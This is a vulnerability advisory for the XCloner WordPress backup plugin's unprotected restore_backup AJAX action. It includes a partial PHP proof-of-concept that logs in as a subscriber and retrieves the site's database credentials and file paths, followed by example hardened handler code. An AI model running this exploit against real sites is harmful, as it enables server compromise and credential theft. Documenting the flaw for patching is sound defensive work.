Database: wpvulndb
Author: Chloe Chamberland
WPVDB-ID: 95774641-16B8-4692-929A-BC45621423E5
History: Sep 22, 2020 - 12:00 a.m.

XCloner Backup and Restore 4.2.1 - 4.2.12 - Unprotected AJAX Action

Source: wpscan.com

"This flaw gave authenticated attackers, with subscriber-level or above capabilities, the ability to modify arbitrary files, including PHP files. Doing so would allow an attacker to achieve remote code execution on a vulnerable site's server. Alternatively, an attacker could create an exploit chain to obtain a database dump due to the same unprotected AJAX endpoint, amongst other things."

PoC

This is just one example of what can happen - this will retrieve the site's DB credentials and full file path.

Usage: `php poc.php mysite.com subscriber password`

```php
// The start of the script (argument handling and the beginning of the wp-login.php
// request) is not present on the page as captured; the fragment resumes inside the
// POST fields of the login request.
                                   $wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]);
$output = curl_exec($ch);
curl_close($ch);

// Update Settings
// Reuse the cookie jar from the login above, so the request is made as the
// authenticated subscriber, and call the unprotected AJAX action.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php?action=restore_backup');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'xcloner_action' => 'get_current_directory' ]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
```
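For contrast with the PoC, the following is an added illustration (not XCloner's own code) of how a WordPress AJAX handler of this shape is protected: a capability check, a nonce check, and an allow-list for the `xcloner_action` sub-action. The hook name `wp_ajax_restore_backup` and the `xcloner_action` parameter mirror the request in the PoC; the function names, the nonce action `xcloner_restore_nonce`, and the stub sub-action are assumed for illustration.

```php
<?php
// Added illustration, not the plugin's code. Function and nonce names are assumed.
// Registering only the wp_ajax_ hook (and not wp_ajax_nopriv_) limits the handler to
// logged-in users, but that alone does not stop a subscriber: any authenticated user can
// POST to admin-ajax.php?action=restore_backup, which is the flaw in 4.2.1 - 4.2.12.
add_action( 'wp_ajax_restore_backup', 'xcloner_restore_backup_handler' );

function xcloner_restore_backup_handler() {
    // 1. Capability check: backup and restore are administrator operations.
    //    A subscriber lacks manage_options, so the request stops here with a 403.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 2. Nonce check: the restore UI issues the token with
    //    wp_create_nonce( 'xcloner_restore_nonce' ) and sends it in the 'nonce' field,
    //    so a logged-in administrator cannot be made to trigger the action from
    //    another site (CSRF). check_ajax_referer() dies on a missing or invalid token.
    check_ajax_referer( 'xcloner_restore_nonce', 'nonce' );

    // 3. Allow-list the sub-action instead of dispatching on arbitrary input.
    $allowed = array(
        'get_current_directory' => 'xcloner_restore_get_current_directory',
        // further sub-actions are added here, one explicit entry each
    );
    $sub_action = isset( $_POST['xcloner_action'] )
        ? sanitize_key( wp_unslash( $_POST['xcloner_action'] ) )
        : '';
    if ( ! isset( $allowed[ $sub_action ] ) ) {
        wp_send_json_error( array( 'message' => 'Unknown action' ), 400 );
    }

    // Only a function named in the allow-list can ever run.
    call_user_func( $allowed[ $sub_action ] );
    wp_die();
}

// Minimal stand-in for one sub-action (assumed); it deliberately returns no
// server paths or credentials, which is what the unprotected version leaked.
function xcloner_restore_get_current_directory() {
    wp_send_json_success( array( 'status' => 'ok' ) );
}
```

The order matters: the capability check runs before the nonce check so that an unprivileged user receives a plain 403 and never learns whether a nonce was expected.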

| CPE Name | Operator | Version |
| --- | --- | --- |
| xcloner-backup-and-restore | lt | 4.2.13 |